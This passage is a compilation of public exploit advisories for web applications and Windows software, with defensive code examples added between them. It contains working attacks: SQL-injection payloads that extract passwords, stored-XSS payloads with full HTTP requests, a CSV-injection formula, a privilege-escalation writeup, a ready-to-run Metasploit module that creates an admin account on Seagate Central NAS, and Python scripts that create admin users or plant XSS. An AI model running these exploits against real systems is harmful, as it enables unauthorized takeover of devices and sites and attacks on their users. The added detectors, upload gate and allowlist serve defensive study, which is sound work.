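    baseline = elapsed("1")
    injected = elapsed(f"1' AND (SELECT 1 FROM (SELECT SLEEP({delay})) AS t) AND 'a'='a")
    return injected - baseline >= delay * 0.8


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, true condition :", view_service_vulnerable(db, "1' AND 1=1 AND 'a'='a"))
    print("vulnerable, false condition:", view_service_vulnerable(db, "1' AND 1=2 AND 'a'='a"))
    print("fixed, same payload        :", view_service_fixed(db, "1' AND 1=1 AND 'a'='a"))
    print("extracted admin password   :", extract_password(db, "admin"))
    print("time-based injection       :", time_based_check(db))
```

On a real target the oracle is the HTTP response (a row rendered or not, or the round-trip time) rather than a cursor, but the decision logic is the same; the fix is the bound-parameter form, which returns no row for every payload here because the whole string is compared against the id column as data.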
-
Zenphoto 1.6 - Multiple stored XSS
Exploit Title: Zenphoto 1.6 - Multiple stored XSS
Application: Zenphoto-1.6 xss poc
Version: 1.6
Bugs: XSS
Technology: PHP
Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/
Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip
Date found: 01-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================

###XSS-1###
steps:
1. create a new album
2. write as Album Description: <iframe src="https://14.rs"></iframe>
3. save and view the album at http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/

=====================================================

###XSS-2###
steps:
1. go to the user account and change the user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)
2. change the postal code to <script>alert(4)</script>
3. wherever the admin user information is rendered as HTML, the XSS triggers

poc video: https://youtu.be/JKdC980ZbLY
-
WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)
Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)
Version: 1.6.1
Bugs: XSS
Technology: PHP
Vendor URL: https://wbce-cms.org/
Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
Date found: 03-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================

###XSS-1###
steps:
1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/)
2. upload a malicious svg file

svg file content ===>

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

poc request:

POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1
Host: localhost
Content-Length: 976
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtO
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167
Connection: close

------WebKitFormBoundary5u4r3pOGl4EnuBtO
Content-Disposition: form-data; name="reqid"

187de34ea92ac
------WebKitFormBoundary5u4r3pOGl4EnuBtO
Content-Disposition: form-data; name="cmd"

upload
------WebKitFormBoundary5u4r3pOGl4EnuBtO
Content-Disposition: form-data; name="target"

l1_Lw
------WebKitFormBoundary5u4r3pOGl4EnuBtO
Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
------WebKitFormBoundary5u4r3pOGl4EnuBtO
Content-Disposition: form-data; name="mtime[]"

1683056102
------WebKitFormBoundary5u4r3pOGl4EnuBtO--

3. open the svg file directly (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg); it is served from the site origin, so the script runs

========================================================================================================================

###XSS-2###
1. go to pages (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages)
2. add a page
3. write <script>alert(4)</script> as the page source content (URL-encoded: %3Cscript%3Ealert%284%29%3C%2Fscript%3E)

payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3E

poc request:

POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1
Host: localhost
Content-Length: 143
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475
Connection: close

page_id=4&section_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save

4. view the page: http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php
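The Bludit and WBCE SVG findings on this page share one pattern: an authenticated user uploads an SVG, the file is stored under the site's origin, and navigating to its URL runs the embedded script as a document. The code below is an added example, not part of either CMS, of the gate an upload handler could apply. It parses the SVG as XML and flags script elements, event-handler attributes, script/data URLs and external resource references; for files it accepts, it returns the response headers (Content-Disposition: attachment, a sandboxing CSP, nosniff) that keep a payload the parser missed from running in the site's origin when the file is opened directly. The two SVG documents are constructed for this example; the malicious one mirrors the PoC above.

```python
# Added example: gate SVG uploads and choose headers that neutralise what the gate misses.
import os
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# Elements that carry or embed script; href schemes that execute when followed.
DANGEROUS_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
SCRIPT_SCHEMES = ("javascript:", "data:", "vbscript:")
# Elements whose href fetches a resource; an external one is data exfiltration or a loader.
REFERENCING_ELEMENTS = {"use", "image", "feimage"}


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on qualified names, lower-case the rest."""
    return name.rsplit("}", 1)[-1].lower()


def svg_active_content(data: bytes) -> List[str]:
    """Return the reasons an uploaded SVG must not be stored as-is; an empty list means clean."""
    try:
        root = ET.fromstring(data)  # expat does not fetch the external DTD named in the DOCTYPE
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    reasons: List[str] = []
    if _local(root.tag) != "svg":
        reasons.append(f"root element <{_local(root.tag)}> is not <svg>")
    for elem in root.iter():
        if not isinstance(elem.tag, str):
            continue  # comments and processing instructions
        name = _local(elem.tag)
        if name in DANGEROUS_ELEMENTS:
            reasons.append(f"<{name}> element")
        for attr, value in elem.attrib.items():
            key = _local(attr)  # xlink:href and plain href both end up as "href"
            v = value.strip().lower()
            if key.startswith("on"):
                reasons.append(f"<{name} {key}> event handler")
            elif key == "href" and v.startswith(SCRIPT_SCHEMES):
                reasons.append(f"<{name} href> uses a script/data URL")
            elif key == "href" and name in REFERENCING_ELEMENTS and v.startswith(("http:", "https:", "//")):
                reasons.append(f"<{name} href> loads an external resource")
    return reasons


def upload_response_headers(filename: str) -> Dict[str, str]:
    """Headers for serving an upload: no inline navigation, no type sniffing, no script via CSP."""
    base = os.path.basename(filename).replace('"', "")
    headers = {
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
        "Content-Disposition": f'attachment; filename="{base}"',
    }
    if base.lower().endswith(".svg"):
        headers["Content-Type"] = "image/svg+xml"
    return headers


def gate_upload(filename: str, data: bytes) -> Tuple[str, object]:
    """The handler's decision: ('reject', reasons) or ('accept', headers to serve it with)."""
    reasons = svg_active_content(data)
    if reasons:
        return "reject", reasons
    return "accept", upload_response_headers(filename)


# Constructed samples: the first mirrors the PoC above, the second is a plain icon.
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(document.location);</script>
</svg>"""

BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
  <polygon points="0,0 0,50 50,0" fill="#009900"/>
</svg>"""


if __name__ == "__main__":
    for name, doc in (("SVG_XSS.svg", MALICIOUS_SVG), ("logo.svg", BENIGN_SVG)):
        print(name, "->", gate_upload(name, doc))
```

The headers matter because parsers miss things: an <img> tag embedding the SVG never runs its script anyway, so attachment disposition costs nothing for the logo use case, while a direct navigation to the file (the step both PoCs end with) downloads it instead of rendering it, and the sandbox CSP denies script even if something does render.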
-
Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation
# Exploit Title: Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation
# Date: 20 May 2023
# Exploit Author: Thurein Soe
# Vendor Homepage: https://filmora.wondershare.com
# Software Link: https://mega.nz/file/tQNGGZTQ#E1u20rdbT4R3pgSoUBG93IPAXqesJ5yyn6T8RlMFxaE
# Version: Filmora 12 ( Build 1.0.0.7)
# Tested on: Windows 10 (Version 10.0.19045.2965)
# CVE : CVE-2023-31747

Vulnerability description:

Filmora is a professional video editing application. Wondershare NativePush Build 1.0.0.7 ships with Filmora 12 (Build 12.2.1.2088) and is installed alongside it. Its service, "NativePushService", runs as LocalSystem from a BINARY_PATH_NAME that is unquoted and contains spaces, and the executable lives under the installing user's own profile (AppData\Local), where BUILTIN\Users hold Full control (F). A local user can therefore either replace WsNativePushService.exe outright, or plant an executable at one of the shorter paths Windows tries before the full unquoted one, and have it started as SYSTEM the next time the service runs; either way this is full local privilege escalation.

C:\>sc qc NativePushService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: NativePushService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wondershare Native Push Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe"
C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe BUILTIN\Users:(ID)F
                                                                                                NT AUTHORITY\SYSTEM:(ID)F
                                                                                                BUILTIN\Administrators:(ID)F
                                                                                                HNINKAYTHAYAR\HninKayThayar:(ID)F
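The MobileTrans and Filmora entries above show the two ways a LocalSystem service ends up running code chosen by an ordinary user: a service binary that low-privileged principals can overwrite (Everyone:(ID)F, BUILTIN\Users:(ID)F in the cacls output), and a BINARY_PATH_NAME that is unquoted and contains spaces. The Python below is an added example, not part of either advisory: it audits pasted sc qc and cacls output for both conditions, offline, so it can be run over text collected from a host. The sample text is constructed from the outputs shown on this page. One caveat the check does not cover: an unquoted path is only exploitable when the user can also create a file in one of the directories along it (for Filmora, a file such as ...\Wondershare\Wondershare.exe), which takes a second ACL check against each of those directories.

```python
# Added example: flag writable service binaries and unquoted service paths from sc qc / cacls text.
import re
from typing import Dict, List, Tuple

# Principals an unprivileged local user belongs to. Full control (F) or Write (W) for any of
# these on a LocalSystem service binary means arbitrary code as SYSTEM at the next service start.
LOW_PRIV_PRINCIPALS = {"everyone", "builtin\\users", "users", "authenticated users",
                       "nt authority\\authenticated users", "nt authority\\interactive"}


def parse_sc_qc(text: str) -> Dict[str, str]:
    """Turn `sc qc <service>` output into a FIELD -> value mapping."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def unquoted_path_with_spaces(image_path: str) -> bool:
    """The unquoted-service-path condition: spaces in the path and no surrounding quotes."""
    p = image_path.strip()
    return " " in p and not p.startswith('"')


def parse_cacls(text: str, image_path: str) -> List[Tuple[str, str]]:
    """Parse `cacls <file>` output into (principal, permission) pairs.

    cacls prints the file path in front of the first ACE; strip it first, otherwise the
    drive-letter colon in C:\\... is mistaken for the principal/permission separator."""
    aces: List[Tuple[str, str]] = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(image_path):
            line = line[len(image_path):].strip()
        m = re.match(r"(.+?):(?:\([A-Z]+\))*([A-Z])$", line)
        if m:
            aces.append((m.group(1), m.group(2)))
    return aces


def weak_binary_aces(aces: List[Tuple[str, str]]) -> List[str]:
    """Low-privileged principals that can rewrite the binary."""
    return [principal for principal, perm in aces
            if perm in ("F", "W") and principal.lower() in LOW_PRIV_PRINCIPALS]


def audit_service(sc_text: str, cacls_text: str) -> List[str]:
    """Run both checks for one service; an empty list means nothing was found."""
    cfg = parse_sc_qc(sc_text)
    path = cfg.get("BINARY_PATH_NAME", "")
    findings: List[str] = []
    if unquoted_path_with_spaces(path):
        findings.append(f"unquoted binary path with spaces: {path}")
    for principal in weak_binary_aces(parse_cacls(cacls_text, path)):
        findings.append(f"{principal} can write the service binary {path}")
    if findings:
        findings.append(f"service {cfg.get('SERVICE_NAME', '?')} runs as "
                        f"{cfg.get('SERVICE_START_NAME', '?')} ({cfg.get('START_TYPE', '?')})")
    return findings


# Constructed samples, transcribed from the outputs shown in the two advisories above.
MOBILETRANS_SC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ElevationService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wondershare Driver Install Service help
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""
MOBILETRANS_CACLS = r"""
C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Everyone:(ID)F
        NT AUTHORITY\SYSTEM:(ID)F
        BUILTIN\Administrators:(ID)F
        BUILTIN\Users:(ID)R
"""
FILMORA_SC = r"""
SERVICE_NAME: NativePushService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe
        SERVICE_START_NAME : LocalSystem
"""
FILMORA_CACLS = r"""
C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe BUILTIN\Users:(ID)F
        NT AUTHORITY\SYSTEM:(ID)F
        BUILTIN\Administrators:(ID)F
        HNINKAYTHAYAR\HninKayThayar:(ID)F
"""

if __name__ == "__main__":
    for label, sc, acl in (("MobileTrans", MOBILETRANS_SC, MOBILETRANS_CACLS),
                           ("Filmora", FILMORA_SC, FILMORA_CACLS)):
        print(label)
        for finding in audit_service(sc, acl) or ["no findings"]:
            print("  -", finding)
```

Note that the MobileTrans path is also reported as unquoted: that is true of the output as shown, though under Program Files the intermediate directories are not user-writable by default, so on that host the writable binary is the exploitable condition and the path finding is the one to verify against directory ACLs.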
-
Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit)
##
# Exploit Title: Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit)
# Date: Dec 9 2019
# Exploit Author: Ege Balci
# Vendor Homepage: https://www.seagate.com/de/de/support/external-hard-drives/network-storage/seagate-central/
# Version: 2015.0916
# CVE : 2020-6627
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/http'
require 'net/ssh'
require 'net/ssh/command_stream'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::SSH

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Seagate Central External NAS Arbitrary User Creation",
      'Description'    => %q{
        This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device.
        Subject product suffers several critical vulnerabilities such as broken access control.
        It makes it possible to change the device state and register a new admin user which is capable of SSH access.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Ege Balcı <egebalci@pm.me>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'],
          ['CVE', '2020-6627']
        ],
      'DefaultOptions' =>
        {
          'SSL' => false,
          'WfsDelay' => 5,
        },
      'Platform'       => ['unix'],
      'Arch'           => [ARCH_CMD],
      'Payload'        =>
        {
          'Compat' => {
            'PayloadType' => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
      'Targets'        =>
        [
          ['Auto', { 'Platform' => 'unix', 'Arch' => ARCH_CMD } ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => "Dec 9 2019",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('USER', [ true, 'Seagate Central SSH user', '']),
        OptString.new('PASS', [ true, 'Seagate Central SSH user password', ''])
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  def check
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"),
      'headers' => { 'X-Requested-With' => 'XMLHttpRequest' }
    },60)

    if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916')
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    # First get current state
    first_state=get_state()
    if first_state
      print_status("Current device state: #{first_state['state']}")
    else
      return
    end

    if first_state['state'] != 'start'
      # Set new start state: the unauthenticated set_start_info endpoint flips the
      # device back into its first-run state, which re-enables the user-creation endpoint.
      first_state['state'] = 'start'
      res = send_request_cgi({
        'method'  => 'POST',
        'uri'     => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'),
        'ctype'   => 'application/x-www-form-urlencoded',
        'data'    => "info=#{first_state.to_json}"
      },60)

      changed_state=get_state()
      if changed_state && changed_state['state'] == 'start'
        print_good("State successfully changed !")
      else
        print_error("Could not change device state")
        return
      end
    end

    name = Rex::Text.rand_name_male
    # The option defaults are empty strings, which are truthy in Ruby, so test for emptiness
    # rather than nil before falling back to random credentials.
    user = datastore['USER'].to_s.empty? ? "#{Rex::Text.rand_name_male}#{rand(1..9999)}" : datastore['USER']
    pass = datastore['PASS'].to_s.empty? ? Rex::Text.rand_text_alpha(8) : datastore['PASS']

    print_status('Creating new admin user...')
    print_status("User: #{user}")
    print_status("Pass: #{pass}")

    # Add new admin user
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"),
      'ctype'     => 'application/x-www-form-urlencoded',
      'headers'   => { 'X-Requested-With' => 'XMLHttpRequest' },
      'vars_post' => {
        user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@localhost", isAdmin: true, uid: -1}),
        action: 1
      }
    },60)

    conn = do_login(user,pass)
    if conn
      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
      handler(conn.lsock)
    end
  end

  def do_login(user, pass)
    factory = ssh_socket_factory
    opts = {
      :auth_methods    => ['password', 'keyboard-interactive'],
      :port            => 22,
      :use_agent       => false,
      :config          => false,
      :password        => pass,
      :proxy           => factory,
      :non_interactive => true,
      :verify_host_key => :never
    }

    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError
      fail_with Failure::Unreachable, 'Connection failed'
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    if ssh
      conn = Net::SSH::CommandStream.new(ssh)
      ssh = nil
      return conn
    end

    return nil
  end

  def get_state
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path,"/index.php/Start/json_get_start_info"),
      'headers' => { 'X-Requested-With' => 'XMLHttpRequest' }
    },60)

    if res && (res.code == 200
||res.code == 100) return res.get_json_document end res = nil end end
-
Ulicms 2023.1 - create admin user via mass assignment
```python
#Exploit Title: Ulicms 2023.1 - create admin user via mass assignment
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs: create admin user via mass assignment
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna

import requests

new_name = input("name: ")
new_email = input("email: ")
new_pass = input("password: ")

url = "http://localhost/dist/admin/index.php"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = (
    "sClass=UserController&sMethod=create&add_admin=add_admin"
    f"&username={new_name}&firstname={new_name}&lastname={new_name}"
    f"&email={new_email}&password={new_pass}&password_repeat={new_pass}"
    "&group_id=1&admin=1&default_language="
)

response = requests.post(url, headers=headers, data=data)

if response.status_code == 200:
    print("Request is success and created new admin account")
else:
    print("Request is failure.!!")

#POC video : https://youtu.be/SCkRJzJ0FVk
```
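The root cause above is mass assignment: every field in the POST body, including `admin=1` and `group_id=1`, is copied into the new user record. The following is an added defensive example, not Ulicms code; it parses a request body of the same shape (the sample values are constructed) and shows how an allowlist keeps privilege-bearing fields out of a self-service registration while logging the attempt.

```python
from urllib.parse import parse_qs

# Fields a self-service registration form is allowed to set.
USER_SETTABLE = ("username", "firstname", "lastname", "email",
                 "password", "password_repeat", "default_language")
# Fields that change privileges; only an authenticated admin may set them.
PRIVILEGED = ("admin", "group_id")
DEFAULT_GROUP_ID = "2"   # constructed: the ordinary-user group in this example


def build_user_from_request(body, actor_is_admin=False):
    """Parse a urlencoded body and return (record, rejected_fields).

    Routing parameters (sClass, sMethod, add_admin) and anything not in
    USER_SETTABLE are ignored. PRIVILEGED fields are honoured only for an
    admin actor; otherwise they are stripped, defaults are applied, and the
    field names are returned so the caller can log the attempt.
    """
    form = {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}
    record = {k: form[k] for k in USER_SETTABLE if k in form}
    if record.get("password") != record.get("password_repeat"):
        raise ValueError("password and password_repeat differ")
    record.pop("password_repeat", None)

    rejected = []
    for field in PRIVILEGED:
        if field not in form:
            continue
        if actor_is_admin:
            record[field] = form[field]
        else:
            rejected.append(field)
    # Safe defaults win whenever the caller was not allowed to choose.
    record.setdefault("admin", "0")
    record.setdefault("group_id", DEFAULT_GROUP_ID)
    return record, rejected


# Constructed body in the shape the advisory's request sends.
SAMPLE_BODY = ("sClass=UserController&sMethod=create&add_admin=add_admin"
               "&username=mallory&firstname=m&lastname=m&email=m@example.test"
               "&password=pw&password_repeat=pw&group_id=1&admin=1&default_language=")

if __name__ == "__main__":
    record, rejected = build_user_from_request(SAMPLE_BODY, actor_is_admin=False)
    print("stored:", record)
    print("dropped privileged fields:", rejected)   # log these as a security event
```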
-
SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)
```python
#!/usr/bin/python3
# Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)
# Google Dork: intitle:"SCM Manager" intext:1.60
# Date: 05-25-2023
# Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829)
# Vendor Homepage: https://scm-manager.org/
# Software Link: https://scm-manager.org/docs/1.x/en/getting-started/
# Version: 1.2 <= 1.60
# Tested on: Debian based
# CVE: CVE-2023-33829

# Modules
import requests
import argparse
import sys

# Main menu
parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')
parser.add_argument("-u", "--user", required=True, help="Admin user or user with write permissions")
parser.add_argument("-p", "--password", required=True, help="password of the user")
args = parser.parse_args()

# Credentials (taken from the parsed arguments rather than fixed sys.argv positions,
# so the options can be given in either order)
user = args.user
password = args.password

# Global Variables
main_url = "http://localhost:8080/scm"  # Change URL if its necessary
auth_url = main_url + "/api/rest/authentication/login.json"
users = main_url + "/api/rest/users.json"
groups = main_url + "/api/rest/groups.json"
repos = main_url + "/api/rest/repositories.json"

# Create a session
session = requests.Session()

# Credentials to send
post_data = {
    'username': user,      # change if you have any other user with write permissions
    'password': password   # change if you have any other user with write permissions
}

r = session.post(auth_url, data=post_data)

if r.status_code == 200:
    print("[+] Authentication successfully")
else:
    print("[-] Failed to authenticate")
    sys.exit(1)

new_user = {
    "name": "newUser",
    "displayName": "<img src=x onerror=alert('XSS')>",
    "mail": "",
    "password": "",
    "admin": False,
    "active": True,
    "type": "xml"
}
create_user = session.post(users, json=new_user)
print("[+] User with XSS Payload created")

new_group = {
    "name": "newGroup",
    "description": "<img src=x onerror=alert('XSS')>",
    "type": "xml"
}
create_group = session.post(groups, json=new_group)
print("[+] Group with XSS Payload created")

new_repo = {
    "name": "newRepo",
    "type": "svn",
    "contact": "",
    "description": "<img src=x onerror=alert('XSS')>",
    "public": False
}
create_repo = session.post(repos, json=new_repo)
print("[+] Repository with XSS Payload created")
```
-
Rukovoditel 3.3.1 - CSV injection
Exploit Title: Rukovoditel 3.3.1 - CSV injection
Version: 3.3.1
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://www.rukovoditel.net/
Software Link: https://www.rukovoditel.net/download.php
Date of found: 27-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
Step 1. Log in as a user.
Step 2. Go to My Account ( http://127.0.0.1/index.php?module=users/account ).
Step 3. Set Firstname to =calc|a!z|
Step 4. If an admin exports customers as a CSV file (http://localhost/index.php?module=items/items&path=1), the CSV injection fires on the admin's computer and opens the calculator.

payload: =calc|a!z|
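The export is the right place to break this chain: a cell whose first character is a formula trigger must be written as text. The following is an added example, not Rukovoditel code, of a CSV exporter that neutralizes such cells; the customer records are constructed, with the advisory's payload as one first name.

```python
import csv
import io

# Leading characters that make spreadsheet software evaluate a cell as a
# formula (OWASP CSV-injection guidance); the payload on this page starts with "=".
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Escape a cell so it is imported as text, never evaluated.

    Strings whose first non-blank character is a formula trigger get a
    leading single quote, which spreadsheets treat as a text marker. The
    csv writer below quotes every field and doubles embedded double quotes,
    so a value cannot close its own quoting. Non-strings (real numbers,
    None) pass through unchanged, so a numeric -5 stays a number.
    """
    if not isinstance(value, str):
        return value
    if value.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def export_customers_csv(rows, fieldnames):
    """Render rows to CSV with every cell quoted and neutralized."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
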